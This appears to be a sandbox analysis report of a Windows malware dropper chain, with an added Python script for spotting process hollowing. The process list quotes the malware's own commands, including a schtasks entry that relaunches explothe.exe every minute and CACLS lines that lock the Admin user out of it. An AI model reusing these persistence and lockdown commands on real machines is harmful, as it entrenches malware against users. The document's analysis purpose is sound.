N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2804 wrote to memory of 2144 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tw9sk06.exe
PID 2804 wrote to memory of 2144 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tw9sk06.exe (2 write events)
PID 2144 wrote to memory of 3544 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tw9sk06.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dn4Re20.exe (3 write events)
PID 3544 wrote to memory of 3628 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dn4Re20.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\MS3rR13.exe (3 write events)
PID 3628 wrote to memory of 660 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\MS3rR13.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vl66Xo1.exe (3 write events)
PID 3628 wrote to memory of 3252 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\MS3rR13.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Bx2067.exe (3 write events)
PID 3252 wrote to memory of 1460 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Bx2067.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe (10 write events)
PID 3544 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dn4Re20.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3TQ78QB.exe (3 write events)
PID 1984 wrote to memory of 3928 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3TQ78QB.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe (6 write events)
PID 2144 wrote to memory of 624 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tw9sk06.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4iG636EF.exe (3 write events)
PID 624 wrote to memory of 400 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4iG636EF.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe (8 write events)
PID 2804 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\5fd4vF9.exe (3 write events)
PID 2500 wrote to memory of 4640 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\5fd4vF9.exe C:\Windows\system32\cmd.exe (2 write events)
PID 4640 wrote to memory of 4928 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (2 write events)
PID 4640 wrote to memory of 3856 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (2 write events)
PID 3856 wrote to memory of 2268 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (2 write events)
PID 4928 wrote to memory of 2820 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (2 write events)
PID 3856 wrote to memory of 4732 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (6 write events)
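The rows above are one per WriteProcessMemory call the sandbox observed, and a parent writing into a child it has just created is also what an ordinary CreateProcess looks like (cmd.exe into msedge.exe here), so the signal is in the tree shape and in the write counts rather than in any single row: the three Temp-resident droppers that each write six to ten times into a fresh AppLaunch.exe are the hollowing targets, not the one-off writes between droppers. The Python below is an added example, not part of the report or of any sandbox tooling. It parses rows in the report's format, rebuilds the parent/child tree, and flags parents under the user's Temp directory that wrote repeatedly into a Microsoft-shipped host under C:\Windows. The MIN_WRITES threshold and the optional trailing "(N write events)" count suffix are assumptions made for this example; the sample rows are copied from the report and abridged.

```python
import re
from collections import Counter, defaultdict

# Row format of the report's "wrote to memory of" table: one row per write
# event as the sandbox emits it. A trailing "(N write events)" count is an
# assumed convention of this example so a collapsed table parses the same way.
ROW_RE = re.compile(
    r"^PID (?P<ppid>\d+) wrote to memory of (?P<cpid>\d+) N/A "
    r"(?P<parent>[A-Z]:\\.*?\.exe) (?P<child>[A-Z]:\\.*\.exe)"
    r"(?: \((?P<n>\d+) write events?\))?$"
)

# Constructed sample: rows copied from this report (abridged; the two rows
# with a count suffix carry the counts the full report shows for those edges).
SAMPLE_ROWS = r"""
PID 2804 wrote to memory of 2144 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tw9sk06.exe
PID 2804 wrote to memory of 2144 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tw9sk06.exe
PID 2144 wrote to memory of 3544 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tw9sk06.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dn4Re20.exe
PID 3544 wrote to memory of 3628 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dn4Re20.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\MS3rR13.exe
PID 3628 wrote to memory of 3252 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\MS3rR13.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Bx2067.exe
PID 3252 wrote to memory of 1460 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Bx2067.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe (10 write events)
PID 2804 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\5fd4vF9.exe
PID 2500 wrote to memory of 4640 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\5fd4vF9.exe C:\Windows\system32\cmd.exe (2 write events)
PID 4640 wrote to memory of 4928 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4928 wrote to memory of 2820 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"""

# Assumed heuristic (not from the report): a process under the user's Temp
# directory that writes MIN_WRITES or more times into a freshly created
# Microsoft-shipped host under C:\Windows is a hollowing candidate. Ordinary
# process creation also shows up as a write or two (cmd.exe into msedge.exe).
MIN_WRITES = 4
TEMP_MARK = "\\appdata\\local\\temp\\"
WINDIR = "c:\\windows\\"


def parse_rows(text):
    """Counter of (ppid, cpid, parent image, child image) -> number of write events."""
    edges = Counter()
    for line in text.strip().splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            raise ValueError(f"unparsed row: {line!r}")
        key = (int(m["ppid"]), int(m["cpid"]), m["parent"], m["child"])
        edges[key] += int(m["n"] or 1)
    return edges


def build_tree(edges):
    """children: ppid -> [(cpid, child image, writes)]; image: pid -> image path."""
    children, image = defaultdict(list), {}
    for (ppid, cpid, parent, child), n in edges.items():
        image[ppid], image[cpid] = parent, child
        children[ppid].append((cpid, child, n))
    return children, image


def roots(children, image):
    """PIDs that never appear as a write target: the top of each tree."""
    spawned = {cpid for kids in children.values() for cpid, _, _ in kids}
    return sorted(pid for pid in image if pid not in spawned)


def render(children, image, pid, depth=0, writes=None, out=None):
    """Indented process tree, one line per process, write count on each edge."""
    out = [] if out is None else out
    tag = "" if writes is None else f"   <- {writes} write event(s) from parent"
    out.append("  " * depth + f"[{pid}] {image[pid]}{tag}")
    for cpid, _, n in sorted(children.get(pid, [])):
        render(children, image, cpid, depth + 1, n, out)
    return out


def hollowing_candidates(edges, min_writes=MIN_WRITES):
    """Edges matching the Temp-parent / Windows-host / repeated-write heuristic."""
    hits = []
    for (ppid, cpid, parent, child), n in edges.items():
        if TEMP_MARK in parent.lower() and child.lower().startswith(WINDIR) and n >= min_writes:
            hits.append((ppid, cpid, child, n))
    return sorted(hits)


if __name__ == "__main__":
    edges = parse_rows(SAMPLE_ROWS)
    children, image = build_tree(edges)
    for root in roots(children, image):
        print("\n".join(render(children, image, root)))
    for ppid, cpid, child, n in hollowing_candidates(edges):
        print(f"hollowing candidate: {ppid} -> {cpid} {child} ({n} writes)")
```

On the full table the same heuristic flags the three AppLaunch.exe edges (1460, 3928 and 400) and nothing else; the cmd.exe edge drops out on the write count and the dropper-to-dropper edges on the target location.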

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\file.exe

"C:\Users\Admin\AppData\Local\Temp\file.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tw9sk06.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tw9sk06.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dn4Re20.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dn4Re20.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\MS3rR13.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\MS3rR13.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vl66Xo1.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vl66Xo1.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Bx2067.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Bx2067.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 3252 -ip 3252

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 1460 -ip 1460

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 540

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3252 -s 592

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3TQ78QB.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3TQ78QB.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 1984 -ip 1984

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1984 -s 580

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4iG636EF.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4iG636EF.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 624 -ip 624

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 624 -s 572

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\5fd4vF9.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\5fd4vF9.exe

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\A633.tmp\A634.tmp\A644.bat C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\5fd4vF9.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x16c,0x170,0x174,0x148,0x178,0x7ffe24f446f8,0x7ffe24f44708,0x7ffe24f44718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x168,0x16c,0x170,0x144,0x174,0x7ffe24f446f8,0x7ffe24f44708,0x7ffe24f44718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2172,14622987555952945728,10516962502020521330,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2288 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,14622987555952945728,10516962502020521330,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2236 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2200,15131534077821605390,11980417360445905116,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2264 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2172,14622987555952945728,10516962502020521330,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2964 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2200,15131534077821605390,11980417360445905116,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2212 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,14622987555952945728,10516962502020521330,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3520 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,14622987555952945728,10516962502020521330,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3396 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,14622987555952945728,10516962502020521330,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3992 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,14622987555952945728,10516962502020521330,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4788 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2172,14622987555952945728,10516962502020521330,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5608 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2172,14622987555952945728,10516962502020521330,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5608 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,14622987555952945728,10516962502020521330,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5740 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,14622987555952945728,10516962502020521330,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5724 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,14622987555952945728,10516962502020521330,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4736 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,14622987555952945728,10516962502020521330,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6080 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\FB38.exe

C:\Users\Admin\AppData\Local\Temp\FB38.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ZI4xM2Zd.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ZI4xM2Zd.exe

C:\Users\Admin\AppData\Local\Temp\FCB0.exe

C:\Users\Admin\AppData\Local\Temp\FCB0.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\pG3rS0fl.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\pG3rS0fl.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Hf8Mh2Uh.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Hf8Mh2Uh.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Lq5hq4TW.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Lq5hq4TW.exe

C:\Users\Admin\AppData\Local\Temp\FDEA.bat

"C:\Users\Admin\AppData\Local\Temp\FDEA.bat"

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1WK02es6.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1WK02es6.exe

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\FEE2.tmp\FEE3.tmp\FEE4.bat C:\Users\Admin\AppData\Local\Temp\FDEA.bat"

C:\Users\Admin\AppData\Local\Temp\185.exe

C:\Users\Admin\AppData\Local\Temp\185.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 5948 -ip 5948

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5948 -s 184

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4656 -ip 4656

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 5284 -ip 5284

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4656 -s 572

C:\Users\Admin\AppData\Local\Temp\4A3.exe

C:\Users\Admin\AppData\Local\Temp\4A3.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5284 -s 540

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 5136 -ip 5136

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5136 -s 412

C:\Users\Admin\AppData\Local\Temp\8F9.exe

C:\Users\Admin\AppData\Local\Temp\8F9.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2NB190Af.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2NB190Af.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:R" /E

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

